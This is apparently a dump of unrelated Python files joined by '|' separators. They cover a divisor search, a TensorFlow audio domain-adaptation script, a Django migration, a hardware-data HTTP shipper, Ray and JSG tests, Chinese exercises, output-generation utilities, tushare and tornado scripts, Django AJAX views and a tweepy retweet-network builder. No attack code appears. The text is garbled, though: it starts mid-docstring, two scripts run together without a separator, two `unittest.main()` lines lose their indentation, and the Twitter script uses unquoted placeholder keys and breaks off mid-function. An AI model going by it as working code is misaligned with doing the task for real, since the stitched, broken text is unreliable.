    Improvements over the original: validates its input (the exercise asks
    for error handling), starts the search at 1 so num=1 correctly yields 1,
    and searches without an arbitrary 10000 cap — a number with exactly n
    divisors always exists (e.g. 2**(n-1)), so the loop terminates.

    :raises ValueError: if *num* is not a positive integer
    """
    if not isinstance(num, int) or num < 1:
        raise ValueError("num must be a positive integer")

    def _divisor_count(value):
        # self-contained O(sqrt(n)) divisor counter (no sibling dependency)
        count = 0
        i = 1
        while i * i <= value:
            if value % i == 0:
                count += 1 if i == value // i else 2
            i += 1
        return count

    candidate = 1
    while True:
        if _divisor_count(candidate) == num:
            return candidate
        candidate += 1
# Demo run for num = 16 (expected smallest number with 16 divisors: 120).
num=16
print("The number of divisors :",num)
result=find_smallest_number(num)
print("The smallest number having",num," divisors:",result)
|
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
from library import *
def seed_all(seed=2020):
    """Seed NumPy and TensorFlow RNGs for reproducible runs.

    NOTE(review): `np` and `tf` are assumed to come from the
    `from library import *` above — confirm.
    """
    np.random.seed(seed)
    tf.random.set_seed(seed)
seed_all()
#########################################################
#########################################################
# import numpy as np
# a = tf.constant([[1,2],[3,6],[1,0]])
# b = tf.constant([15,8])
# temp = np.tile(np.square(np.linalg.norm(a,axis=1)),(b.shape[0],1)) + np.tile(np.square(np.linalg.norm(b,axis=1)),(a.shape[0],1)).T - (2*(np.matmul(b,a.T)))
# print(tf.norm(a-b,1,axis=1))
def generate_data_single(name,SR=data_mir.SR,Hs=data_mir.Hs,Ws=data_mir.Ws,N_fft=data_mir.N_fft):
    """Load one mirex05 recording and its pitch reference as (X, Y).

    X is the dB-scaled STFT magnitude, one frame per row; Y is the
    reference pitch value per frame (column 1 of <name>REF.txt).  Both
    are truncated to the shorter of the two so frames and labels align.

    :param name: base filename inside the `mirex05` directory
    :param SR,Hs,Ws,N_fft: sample rate, hop/window sizes (seconds), FFT size
    """
    f_path1 = os.path.join('mirex05',name+'.wav')
    f_path2 = os.path.join('mirex05',name+'REF.txt')
    wav, sr = librosa.core.load(f_path1,sr=SR)
    # hop/window are given in seconds; convert to samples
    HOP_len = int(sr * Hs)
    WIN_len = int(sr * Ws)
    temp = np.abs(librosa.core.stft(wav,hop_length=HOP_len,win_length=WIN_len,n_fft=N_fft))
    temp = librosa.core.amplitude_to_db(temp,ref=np.mean)
    pitch_vals = np.loadtxt(f_path2)
    # frames and reference rows may differ by one; keep the common prefix
    minm = min(temp.shape[1],pitch_vals.shape[0])
    X = (temp.T)[:minm]
    Y = pitch_vals[:minm,1]
    return X,Y
#########################################################
#########################################################
# Build the target-domain data from one labelled recording.
target_X,target_Y = generate_data_single('train06')
# Keep only frames with pitch > 1 (presumably the voiced frames — confirm).
target_X = target_X[target_Y>1]
target_Y = target_Y[target_Y>1]
target_X = transform_X(target_X[:,:512])
ind = np.arange(target_X.shape[0])
# ind = np.array([2093,2127,2052,647,714,741,641,548,558,756,31,37,143,49,1241,301])
np.random.shuffle(ind)
# Sample 16 random target frames for few-shot adaptation.
x_tar = tf.convert_to_tensor(np.take(target_X,ind[:16],0))
y_tar = tf.convert_to_tensor(np.take(target_Y,ind[:16],0))
model = NN_regressor_dsne(512)
model.load_weights('saved_models/model_mir_for_dsne_weights.h5')
# obj = np.empty(n_class,dtype=object)
# for c in range(n_class):
#     obj[i] = np.argwhere(np.round(freq2midi(y_src))==c)[0]
# tar = tf.data.Dataset.from_tensor_slices((x_tar, y_tar))
# tar = tar.shuffle(y_tar.shape[0]+1, reshuffle_each_iteration=True)
def hausdorffian_distance(xt,y,feat_src,y_src):
    """Contrastive distance term for d-SNE-style domain adaptation.

    Returns (max L2 distance from `xt` to same-pitch-class source features)
    minus (min L2 distance to different-class source features); minimizing
    it pulls `xt` toward its class and away from the others.

    NOTE(review): ``np.argwhere(...)[0]`` keeps only the FIRST matching
    source index, so `ind_y` is a single element rather than the whole
    same-class set — confirm this is intended.
    """
    y_src = y_src.numpy()
    y = y.numpy()
    # source samples whose rounded MIDI pitch matches the target's
    ind_y = np.argwhere(np.round(freq2midi(y_src))==np.round(freq2midi(y)))[0]
    all_ind = np.arange(feat_src.shape[0])
    ind_not_y = np.setxor1d(all_ind, ind_y)
    same_class_max = tf.reduce_max(tf.norm(tf.gather(feat_src,ind_y)-xt,2,axis=1))
    diff_class_min = tf.reduce_min(tf.norm(tf.gather(feat_src,ind_not_y)-xt,2,axis=1))
    return same_class_max-diff_class_min
# NOTE(review): `model` is invoked with no inputs and `pred` is never used
# by the active code below — looks like leftover debugging; confirm.
pred = model()
# ind_1 = np.arange(100)
# opt = tf.keras.optimizers.Adam(0.0005)
# loss_mse = tf.keras.losses.MeanAbsoluteError()
# epochs = 25; alpha=0.5; beta=1.0
# acc = []
# for epoch in range(epochs):
# # tar = tar.shuffle(len_tar+1)
# count=0
# np.random.shuffle(ind_1)
# for tar_x,tar_y in tar:
# for src_ind in ind_1[:10]:
# x_src = tf.convert_to_tensor(np.load('data/dsne/src/src_X_t_{}.npy'.format(src_ind)))
# y_src = tf.convert_to_tensor(np.load('data/dsne/src/src_Y_{}.npy'.format(src_ind)))
# with tf.GradientTape() as tape:
# out_src = model(x_src,training=True)
# out_tar = model(x_tar,training=True)
# out_tar_sample = model(tf.reshape(tar_x,[1,tar_x.shape[0]]),training=True)
# loss_mse_tot = loss_mse(y_src,out_src[0]) + beta*loss_mse(y_tar,out_tar[0])
# loss_value= (
# (1-alpha)*loss_mse_tot
# + alpha*hausdorffian_distance(out_tar_sample[1],tar_y,out_src[1],y_src)
# )
# grads = tape.gradient(loss_value,model.trainable_weights)
# opt.apply_gradients(zip(grads, model.trainable_weights))
# print('epoch',epoch,'target count',count,'source',src_ind)
# count+=1
# rpa,_ = evaluation_dsne(model,target_X,target_Y)
# acc.append(rpa)
# print('############################')
# print('epoch',epoch,'target_RPA',rpa)
# print('############################')
# # model.save_weights('saved_models/dsne/model_dsne_weights.h5')
# acc.reverse()
# acc.append(0.5)
# acc.reverse()
# acc = np.array(acc)
# print(np.max(acc),np.argmax(acc))
# plt.plot(np.arange(epochs+1),acc,'o-')
# plt.show() |
# Generated by Django 3.0.2 on 2020-03-19 19:47
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration for the products app: Category, Product, Image.

    NOTE(review): every ``updated_at`` column uses ``auto_now_add=True``
    (set once at creation); ``auto_now=True`` was probably intended.  Fix
    it in the models and generate a follow-up migration — do not edit
    this applied migration in place.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('category', models.CharField(max_length=120)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('author', models.CharField(max_length=250)),
                ('title', models.CharField(max_length=120, unique=True)),
                ('description', models.TextField()),
                ('current_price', models.FloatField()),
                ('old_price', models.FloatField(blank=True, null=True)),
                ('date_of_publication', models.DateField()),
                ('lable', models.CharField(choices=[('new', 'new'), ('best saler', 'best saler')], max_length=50)),
                ('slug', models.SlugField(blank=True, null=True)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now_add=True)),
                ('stock', models.IntegerField(default=1)),
                ('category', models.ManyToManyField(to='products.Category')),
                # NOTE(review): null=True has no effect on ManyToManyField
                ('related_product', models.ManyToManyField(blank=True, null=True, related_name='_product_related_product_+', to='products.Product')),
            ],
        ),
        migrations.CreateModel(
            name='Image',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('image', models.ImageField(upload_to='books/')),
                ('front', models.BooleanField(default=False)),
                ('back', models.BooleanField(default=False)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now_add=True)),
                ('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.Product')),
            ],
        ),
    ]
|
from jsonpickle import encode as json_encode
from requests import post as http_post, get as http_get
from Client.Logger import logger
class Shipper(object):
    """
    Responsible for sending hardware_objects_lib.Computer objects
    to the centralized server which handles these data.
    """
    def __init__(self, host, port, timeout=5):
        """Build the ship/ping endpoint URLs and ping the server once.

        :param host: server hostname or IP
        :param port: server port
        :param timeout: per-request timeout in seconds
        """
        self.timeout = timeout
        common_endpoint_format = "http://{host}:{port}/{endpoint}"
        self._server_ship_address = common_endpoint_format.format(
            host=host, port=port,
            endpoint="api/add_measurement"
        )
        self._server_ping_address = common_endpoint_format.format(
            host=host, port=port,
            endpoint="api/ping"
        )
        # Detect an unreachable server early (log-only; does not raise).
        self._ping_server()

    def _ping_server(self):
        """Ping the server; log criticals (never raise) on any failure."""
        try:
            response = http_get(self._server_ping_address, timeout=self.timeout)
            # BUG FIX: this validation used `assert`, which is stripped
            # under `python -O` and would silently skip the check.
            if response.status_code != 200 or response.text != 'pong':
                raise ValueError(
                    "unexpected ping response: %i %s"
                    % (response.status_code, response.text))
        except Exception as ex:
            logger.critical("Pinging the server failed! Shipping will probably fail!")
            logger.critical("Exception msg: [%s]" % str(ex))

    def ship(self, computer_obj):
        """POST a json-pickled measurement; network failures are only logged.

        :param computer_obj: hardware_objects_lib.Computer instance to send
        """
        try:
            computer_json = json_encode(computer_obj, unpicklable=True)
            payload = {
                'payload': computer_json
            }
            response = http_post(self._server_ship_address, data=payload, timeout=self.timeout)
            if response.status_code == 200:
                pass  # accepted
            elif response.status_code == 202:
                logger.warning('The server ignored the shipped measurement')
            else:
                logger.warning(
                    'Server responded with status code %i and message %s' % (response.status_code, response.text))
        except Exception as ex:
            logger.critical("Cannot ship to the server")
            logger.critical("Exception msg: [%s]" % str(ex))
|
import os
import pytest
import sys
import ray
@pytest.mark.parametrize(
    "call_ray_start_with_external_redis", [
        "6379",
        "6379,6380",
        "6379,6380,6381",
    ],
    indirect=True)
def test_using_hostnames(call_ray_start_with_external_redis):
    """Smoke-test ray.init against an external Redis (1-3 shard ports).

    The indirect fixture (defined elsewhere) starts a ray head node using
    the given Redis port list; we then verify that a remote task and a
    remote actor both round-trip correctly.
    """
    ray.init(address="127.0.0.1:6379", _redis_password="123")

    @ray.remote
    def f():
        return 1

    # remote task works
    assert ray.get(f.remote()) == 1

    @ray.remote
    class Counter:
        def __init__(self):
            self.count = 0

        def inc_and_get(self):
            self.count += 1
            return self.count

    # remote actor with mutable state works
    counter = Counter.remote()
    assert ray.get(counter.inc_and_get.remote()) == 1
if __name__ == "__main__":
    # `pytest` is already imported at module level; the redundant local
    # `import pytest` was removed.
    # Make subprocess happy in bazel.
    os.environ["LC_ALL"] = "en_US.UTF-8"
    os.environ["LANG"] = "en_US.UTF-8"
    sys.exit(pytest.main(["-v", __file__]))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
创建一个模块,包含一个阶乘函数f1(n)、一个列表删值函数f2(lst,x),一个等差数列求和函数f3(a,d,n)
'''
#阶乘 从1开始乘
def factorial(n):
    """Compute n! iteratively and print it (output text is Chinese).

    Returns None; the result is only printed.
    """
    result = 1
    # multiplying from 2 upward; 0! and 1! fall through as 1
    for i in range(2, n + 1):
        result *= i
    print('%d的阶乘为:%d' %(n, result))
#列表删值函数 入参为:list,想删的值
def remove_lst(lst, x):
    """Remove every occurrence of *x* from *lst* in place, then print the list.

    PERF FIX: the original looped ``while x in lst: lst.remove(x)``, which
    is O(n^2); a single filtering pass assigned back through a slice keeps
    the in-place (caller-visible) mutation in O(n).
    """
    lst[:] = [item for item in lst if item != x]
    print('删除后的结果为:',lst)
def arithmetic_progression_sum(a, d, n):
    """Print the sum of an arithmetic progression (output text is Chinese).

    :param a: first term
    :param d: common difference
    :param n: number of terms
    Returns None; the result is only printed.  FIX: the running total was
    named ``sum``, shadowing the builtin.
    """
    term = a
    total = a
    for _ in range(n - 1):
        term += d
        total += term
    print('首项为%d,公差为%d,项数为%d,等差数列的和为%d' %(a, d, n, total))
# demo run: 10 + 15 + 20 + 25 + 30 = 100
arithmetic_progression_sum(10,5,5)
|
'''
Created on Dec 21, 2012
@author: dough
'''
import unittest
from mock import MagicMock
from recording_schedule import *
from time import time
from source import Source
class TestRecordingSchedule(unittest.TestCase):
    """Tests for RecordingSchedule naming, timing rules, and source delegation."""

    def setUp(self):
        self._source = Source("dummy source")
        self.rec_sch = RecordingSchedule(self._source)

    def test_nameDefaultToBlankString(self):
        self.assertEqual(self.rec_sch.name, '')

    def test_canBeAssignedAName(self):
        assigned_name = 'My Schedule'
        self.rec_sch.name = assigned_name
        self.assertEqual(self.rec_sch.name, assigned_name)

    def test_targetsASource(self):
        self.assertIsInstance(self.rec_sch.source, Source)

    def test_startTimeDefaultsToImmediate(self):
        self.assertEqual(self.rec_sch.start_date_time, int(time()) )

    def test_endTimeDefaultsToStartPlusDefaultDuration(self):
        self.assertEqual(self.rec_sch.end_date_time, self.rec_sch.start_date_time + self.rec_sch.DEFAULT_DURATION)

    def test_startTimeCanNotBeInThePast(self):
        start_time = time() - 5
        self.assertRaises(StartTimeHasPassedError, RecordingSchedule, self._source, start_date_time=start_time)

    def test_endTimeCanNotBeInThePast(self):
        end_time = time() - 5
        self.assertRaises(EndTimeHasPassedError, RecordingSchedule, self._source, end_date_time=end_time)

    def test_endTimeMustBeAfterStartTime(self):
        # equal start/end must be rejected, not just end < start
        now = time()
        start_time = now
        end_time = now
        self.assertRaises(EndBeforeStartError, RecordingSchedule, self._source, start_date_time=start_time,
                          end_date_time=end_time)

    def test_startRecordingCallsStartRecordingOnTargetSource(self):
        self._source.start_recording = MagicMock(name='start_recording')
        self.rec_sch.start_recording()
        self.assertTrue(self._source.start_recording.called)

    def test_stopRecordingCallsStopRecordingOnTargetSource(self):
        self.rec_sch.start_recording()
        # FIX: the mock's repr name was copy-pasted as 'start_recording',
        # which made failure output for this test misleading.
        self._source.stop_recording = MagicMock(name='stop_recording')
        self.rec_sch.stop_recording()
        self.assertTrue(self._source.stop_recording.called)
class TestRecordingScheduleLifecycleBehaviour(unittest.TestCase):
    """Tests for the RecordingSchedule status state machine.

    Expected transitions: NOT_SCHEDULED -> SCHEDULED (schedule) ->
    ACTIVE (start_recording) -> COMPLETE (stop_recording), with CANCELLED
    reachable from SCHEDULED or ACTIVE; invalid transitions raise.
    """
    def setUp(self):
        self._source = Source("dummy source")
        self.rec_sch = RecordingSchedule(self._source)

    def test_afterCreation_statusIsNotScheduled(self):
        self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_NOT_SCHEDULED)

    def test_afterScheduleCalled_statusIsScheduled(self):
        self.rec_sch.schedule()
        self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_SCHEDULED)

    def test_afterStartRecording_statusIsActive(self):
        self.rec_sch.start_recording()
        self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_ACTIVE)

    def test_afterStoppingAnActiveRecording_statusIsComplete(self):
        self.rec_sch.start_recording()
        self.rec_sch.stop_recording()
        self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_COMPLETE)

    def test_cancelledWhenActive_statusIsCancelled(self):
        self.rec_sch.start_recording()
        self.rec_sch.cancel()
        self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_CANCELLED)

    def test_cancelledWhenScheduled_statusIsCancelled(self):
        self.rec_sch.schedule()
        self.rec_sch.cancel()
        self.assertEqual(self.rec_sch.status, RecordingSchedule.STATUS_CANCELLED)

    def test_cancellingWhenNotScheduledIsNotScheduledError(self):
        self.assertRaises(NotScheduledError, self.rec_sch.cancel)

    def test_stopRecordingWhenNotStartedIsNotStartedError(self):
        self.assertRaises(NotStartedError, self.rec_sch.stop_recording)
if __name__ == "__main__":
unittest.main() |
#
# Outputer utils
#
# Copyright (c) 2020, Arm Limited. All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
#
import os
import builtins
import abc
import collections as co
import itertools as it
import string
import io
import re
from ..glue import Inherit
OUTPUTS = co.OrderedDict()
def output(cls):
    """Class decorator: register an Output subclass in OUTPUTS by its arg name."""
    key = cls.__argname__
    assert key not in OUTPUTS
    OUTPUTS[key] = cls
    return cls
# TODO enable inclusive inheritance between StringIO and file?
class OutputBlob(io.StringIO):
    """A StringIO with %(attr)s interpolation and indentation tracking.

    Attributes live on a stack of dicts (pushattrs/popattrs, later frames
    win); writef interpolates its format string against the merged view
    and re-indents after every newline by the current 'indent' attribute.
    Upper-cased aliases of string attributes are resolved automatically.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args)
        self._attrs = []            # stack of attribute dicts, later wins
        self._needindent = True     # emit indent before the next character
        self.pushattrs(**{'':''})   # sentinel frame so '%()s' resolves
        self.pushattrs(**kwargs)
    def writef(self, _fmt, **kwargs):
        """Write `_fmt` %-interpolated against the current attributes."""
        with self.pushattrs(**kwargs):
            _fmt = _fmt % self.attrs()
            for c in _fmt:
                if c == '\n':
                    self._needindent = True
                else:
                    if self._needindent:
                        self._needindent = False
                        super().write(self.get('indent', 0)*' ')
                self.write(c)
    def print(self, *args):
        """Write each arg verbatim (no interpolation), then a newline."""
        for arg in args:
            self.write(str(arg))
        self.write('\n')
    def printf(self, *args, **kwargs):
        """Write each arg via writef (with interpolation), then a newline."""
        for arg in args:
            self.writef(str(arg), **kwargs)
        self.writef('\n')
    def pushattrs(self, **kwargs):
        """Push an attribute frame; returns a context manager that pops it."""
        nkwargs = {}
        for k, v in kwargs.items():
            # eagerly expand %(...) references against the current attrs
            while isinstance(v, str) and '%(' in v:
                v = v % self.attrs(**kwargs)
            nkwargs[k] = v
        self._attrs.append(nkwargs)
        class context:
            def __enter__(_):
                return self
            def __exit__(*_):
                self.popattrs()
        return context()
    def popattrs(self):
        return self._attrs.pop()
    def indent(self, indent=4):
        """ alias for pushindent """
        # BUG FIX: the indent argument was previously dropped (pushindent()
        # was called with no argument, so indent(n) always indented by 4).
        return self.pushindent(indent)
    def pushindent(self, indent=4):
        return self.pushattrs(indent=self.get('indent', 0) + indent)
    def popindent(self):
        # only valid when the top frame is exactly a pushindent frame
        assert set(self._attrs[-1].keys()) == {'indent'}
        return self.popattrs()['indent']
    def _expand(self, k, v):
        # TODO: expanding callables here took too long; left as identity
        return v
    def _expandall(self, attrs):
        expanded = {}
        for k, v in attrs.items():
            if v is None:
                continue
            expanded[k] = self._expand(k, v)
            # provide an upper-cased alias for string attributes
            if k.upper() not in expanded and isinstance(expanded[k], str):
                expanded[k.upper()] = expanded[k].upper()
        return expanded
    def __getitem__(self, key):
        # exact key wins, searched from the newest frame down; None hides a key
        for a in reversed(self._attrs):
            if key in a:
                if a[key] is None:
                    raise KeyError(key)
                return self._expand(key, a[key])
        # fall back to upper-cased aliases
        for a in reversed(self._attrs):
            a = {k.upper(): v for k, v in a.items()}
            if key in a:
                return self._expand(key, a[key]).upper()
        raise KeyError(key)
    def __contains__(self, key):
        try:
            self[key]
            return True
        except KeyError:
            return False
    def get(self, key, default=None):
        try:
            return self[key]
        except KeyError:
            return default
    def attrs(self, **kwargs):
        """Merged view of all frames (plus kwargs), expanded with aliases."""
        attrs = {}
        for a in self._attrs:
            attrs.update(a)
        attrs.update(kwargs)
        return self._expandall(attrs)
    def __str__(self):
        return self.getvalue()
class OutputField(list):
    """A list of OutputBlobs with attribute inheritance and render rules.

    `inherit` supplies default attributes (typically the owning Output);
    `rules` maps types to callbacks that render a value of that type into
    a freshly created blob.
    """
    def __init__(self, inherit=None, rules={}, **kwargs):
        # NOTE(review): mutable default `rules={}` is safe only because it
        # is never mutated here.
        super().__init__()
        self._inherit = inherit
        self._rules = rules
        self._attrs = kwargs
    def insert(self, _i, _fmt=None, **kwargs):
        """Insert at `_i`; pre-built blobs go in as-is, anything else is
        rendered into a new blob carrying inherited+field+call attrs."""
        if isinstance(_fmt, OutputBlob):
            outf = _fmt
        else:
            outf = OutputBlob(**{
                **self._inherit.attrs(),
                **self._attrs,
                **kwargs})
            # first matching type rule renders the value; otherwise treat
            # it as a writef format string
            for type, rule in self._rules.items():
                if isinstance(_fmt, type):
                    rule(outf, _fmt)
                    break
            else:
                if _fmt is not None:
                    outf.writef(_fmt)
        super().insert(_i, outf)
        return outf
    def append(self, _fmt=None, **kwargs):
        """Append via insert; returns the (possibly new) blob."""
        return self.insert(len(self), _fmt, **kwargs)
    def extend(self, iterable):
        for x in iterable:
            self.append(x)
class Output(Inherit(
        ['%s%s%s' % (op, level, order)
        for op, level, order in it.product(
            ['box', 'build'],
            ['_root', '_muxer', '_parent', ''],
            ['_prologue', '', '_epilogue'])]), OutputBlob):
    """Base class for generated output files.

    Inherits every box/build hook combination (e.g. build_parent_prologue)
    via the Inherit mixin, plus OutputBlob's formatting machinery.
    """
    @classmethod
    def __argparse__(cls, parser, **kwargs):
        # accept the path both positionally and as --path
        parser.add_argument("path",
            help=cls.__arghelp__)
        parser.add_argument("--path",
            help=cls.__arghelp__)
    def __init__(self, path=None):
        super().__init__()
        self.name = self.__argname__
        self.path = path
    def __eq__(self, other):
        # outputs compare by name, also directly against plain strings.
        # NOTE(review): defining __eq__ without __hash__ makes instances
        # unhashable — confirm none are used as dict/set keys.
        if isinstance(other, Output):
            return self.name == other.name
        else:
            return self.name == other
    def __lt__(self, other):
        if isinstance(other, Output):
            return self.name < other.name
        else:
            return self.name < other
    def box(self, box):
        """Bind this output to a box, exposing related box names as attrs."""
        super().box(box)
        self.pushattrs(
            name=self.name,
            path=self.path,
            root=getattr(box.getroot(), 'name', None),
            muxer=getattr(box.getmuxer(), 'name', None),
            parent=getattr(box.getparent(), 'name', None),
            box=box.name)
# Output class imports
# These must be imported here, since they depend on the above utilities
from .c import HOutput, COutput
from .ld import LdOutput
from .mk import MkOutput
from .rust import RustLibOutput
from .wasm import WasmHOutput, WasmCOutput
# output glue for connecting default runtime generation
import importlib
from .. import glue
importlib.reload(glue)
class OutputGlue(glue.Glue):
    """Glue that re-exports every output hook under a per-output name.

    e.g. an output class's ``build_parent_epilogue`` becomes
    ``self.build_parent_<argname>_epilogue`` so default runtime generation
    can dispatch to it by name.
    """
    __argname__ = "output_glue"
    def __init__(self):
        super().__init__()
        # we offer redirection for build_parent_mk -> parent.mk.build_parent
        for op, level, Output, order in it.product(
                ['box', 'build'],
                ['_root', '_muxer', '_parent', ''],
                OUTPUTS.values(),
                ['_prologue', '', '_epilogue']):
            m = getattr(Output, '%s%s%s' % (op, level, order), None)
            if m:
                setattr(self, '%s%s_%s%s' % (
                    op, level, Output.__argname__, order), m)
|
#-*- coding:utf-8 -*-
'''
Created on 2015年11月29日
@author: LeoBrilliant
'''
#-*- coding:utf-8 -*-
'''
Created on 2015年11月25日
@author: LeoBrilliant
#获取大盘指数历史行情
'''
import DBAccess.MySQLdb.MySQLAccess as msql
import tushare as ts
from datetime import datetime
# Connect to the database; parameters are host, user, password, database.
#db = MySQLdb.connect("localhost", "root", "", "Data")
#db = MySQLdb.connect(host="localhost", user="root", passwd="", db="Data", charset="utf8")
db = msql.MySQLConnection.GetConnection()
tradingday = datetime.strftime(datetime.today(), "%Y-%m-%d")
code = '600848'
# NOTE(review): this overwrites the "today" value computed above with a
# fixed date — presumably left over from testing; confirm before relying on it.
tradingday = '2015-11-27'
data = ts.get_tick_data(code=code, date=tradingday)
data['tradingday'] = tradingday
data['code'] = code
indexdata = data.set_index(['tradingday', 'code'])
#ret = indexdata.to_sql("t_his_tick_data", db, flavor="mysql", if_exists="append")
# close the connection
db.close()
print("Success")
import asyncio
from tornado import websocket
# define a coroutine
async def custom_coroutine():
    """Probe tornado websocket read/write behaviour around connection close.

    Assumes a server is listening on localhost:8000/test and sends at
    least two messages before closing — TODO confirm.  Demonstrates:
    reading an open socket, draining a buffered message after close,
    read_message() returning None once closed and drained, and
    WebSocketClosedError on write.
    """
    print("opening a websocket to localhost:8000/test")
    await asyncio.sleep(1)
    ws= await websocket.websocket_connect("ws://localhost:8000/test")
    print("trying to read an open websocket")
    await asyncio.sleep(1)
    first_message= await ws.read_message()
    print("first message is " + first_message + ". sleeping 4 seconds")
    await asyncio.sleep(4)
    print("trying to read again, this time on closed websocket but with unread message")
    first_message= await ws.read_message()
    print("second message is " + first_message)
    await asyncio.sleep(1)
    print("trying to read again on closed websocket")
    # read_message() returns None once the socket is closed and drained
    message= await ws.read_message()
    print("Got " + str(message), "indicating that websocket's closed and theres no unread messages")
    print("trying to write to the closed websocket")
    await asyncio.sleep(1)
    try:
        await ws.write_message("aaa")
    except websocket.WebSocketClosedError as e:
        print("Got WebsocketClosedError: " + str(e))
    print("trying to read again, on a closed websocket")
    message= await ws.read_message()
    # NOTE(review): function-scope import; move to the module top per convention
    import random
    if random.randint(0,9) % 2==0:
        # exercised on ~half of the runs to demonstrate the hang case
        print("trying to read again, on a closed websocket. It hangs")
        await asyncio.sleep(1)
        message= await ws.read_message()
# execute the coroutine
asyncio.run(custom_coroutine())
|
import time
from django.http import HttpResponse
from django.shortcuts import render
# Create your views here.
def handle_ajax(request):
    """
    Accept an AJAX request and respond with a short text body.

    Sleeps 10s to simulate slow server-side work, echoes the posted
    name/age to stdout, then returns a plain-text Chinese greeting.
    :param request: Django HttpRequest (expects POST fields "name", "age")
    :return: HttpResponse
    """
    time.sleep(10)
    name = request.POST.get("name")
    age = request.POST.get("age")
    print(name,age)
    #...... business logic would go here
    # respond with a short text body
    return HttpResponse("你好,这是给你的响应")
def handle_username(request):
    """
    Check whether the submitted username is already taken.

    Sleeps 3s to simulate the lookup; returns "error" for a duplicate
    username, "ok" otherwise.
    :param request: Django HttpRequest with POST field "username"
    :return: HttpResponse("error") or HttpResponse("ok")
    """
    time.sleep(3)
    username = request.POST.get("username")
    # real validation would be e.g. XXX.objects.get(username=username);
    # the hard-coded name stands in for an existing user
    if username == "wanglulu":
        return HttpResponse("error")
    return HttpResponse("ok")
def test(request):
    # NOTE(review): stub view — it returns None, which Django rejects at
    # request time; implement or remove before wiring it into urls.
    pass
|
import unittest
from tests.test_python_generator.utils import PythonGeneratorUtils
class ListTestCase(PythonGeneratorUtils):
    """Generator tests for JSG list cardinalities ('*' = zero+, '+' = one+)."""
    # keep generated files out of the tree after the run
    save_output_files: bool = False

    def test_list(self):
        import tests.test_python_generator.py.list as doc
        # '*' cardinality: the empty list is allowed
        jsg = 'l {e:@string*}'
        test_cases = [
            '{"e": []}',
            '{"e": ["abc"]}'
        ]
        self.do_test(jsg, 'list', doc, test_cases, {})

        import tests.test_python_generator.py.list_2 as doc2
        # '+' cardinality: at least one element is required
        jsg2 = 'l {e:@string+}'
        test_cases2 = [
            '{"e": ["abc"]}'
        ]
        # missing, null, and empty lists must all be rejected
        fail_test_cases2 = [
            '{}',
            '{"e": null}',
            '{"e": []}',
        ]
        self.do_test(jsg2, 'list_2', doc2, test_cases2, {}, fail_test_cases2)
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
__author__ = 'oscar@outliers.es'
# Twitter lib used for user lookup + streaming: https://github.com/sixohsix/twitter [easy_install twitter]
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
import pprint
import json
import traceback
import shutil
# Go to http://dev.twitter.com and create an app.
# The consumer key and secret will be generated for you after
consumer_key = YOUR_CONSUMER_KEY
consumer_secret = YOUR_CONSUMER_SECRET
# After the step above, you will be redirected to your app's page.
# Create an access token under the the "Your access token" section
access_token = YOUR_ACCESS_TOKEN
access_token_secret = YOUR_TOKEN_SECRET
TMP_FILE = "network.tmp.json"
DEF_FILE = "network.json"
nodes = []
links = []
nodes_dict = {}
links_dict = {}
# Persist the network into a d3 force layout consumible json
def persist_network():
    """Atomically persist nodes/links as d3 force-layout JSON.

    Writes to a temp file then moves it over the destination so readers
    never observe a partially written document.  NOTE: opening in 'wb'
    works because this script is Python 2 (str is bytes); use 'w' when
    porting to Python 3.
    """
    with open(TMP_FILE, "wb") as file_out:
        json.dump({'nodes': nodes, 'links': links}, file_out)
    shutil.move(TMP_FILE, DEF_FILE)
# Inserts a tweet into the network structure
def insert_tweet_in_network(tweet):
    """Add a retweet edge (original author -> retweeter) to the network.

    Updates the module-level nodes/links structures, increments the edge
    weight, and persists the whole network to disk after every insert.
    (Python 2 print syntax: this script is Python 2 throughout.)
    """
    # Get source and target
    source_user = tweet['retweeted_status']['user']['screen_name']
    source_followers = tweet['retweeted_status']['user']['followers_count']
    target_user = tweet['user']['screen_name']
    target_followers = tweet['user']['followers_count']
    print "INSERTING edge from %s w/ follower count %d to %s w/ follower count %d" \
          % (source_user, source_followers, target_user, target_followers)
    # Insert nodes if they do not exist
    if source_user not in nodes_dict:
        nodes_dict[source_user] = len(nodes)
        nodes.append({'user': source_user, 'followers': source_followers})
    if target_user not in nodes_dict:
        nodes_dict[target_user] = len(nodes)
        nodes.append({'user': target_user, 'followers': target_followers})
    # Insert links if they do not exist
    link_name = source_user + "->" + target_user
    if link_name not in links_dict:
        links_dict[link_name] = len(links)
        links.append({'source': nodes_dict[source_user], 'target': nodes_dict[target_user], 'value': 0})
    # Increment 'value' content for the link
    links[links_dict[link_name]]['value'] += 1
    # persist after every edge so readers always see current data
    persist_network()
class MyListener(StreamListener):
    """ Listener that calls insert_tweet_in_network if a retweet comes by
    """
    def on_data(self, data):
        # each `data` is one raw tweet JSON string from the stream
        tweet = json.loads(data)
        try:
            # only retweets carry the 'retweeted_status' key
            if 'retweeted_status' in tweet:
                insert_tweet_in_network(tweet)
        except:
            # NOTE(review): bare except keeps the stream alive on any error;
            # the traceback is dumped below rather than silently swallowed
            print "*UNEXPECTED ERROR, TRACE DUMP HERE:*"
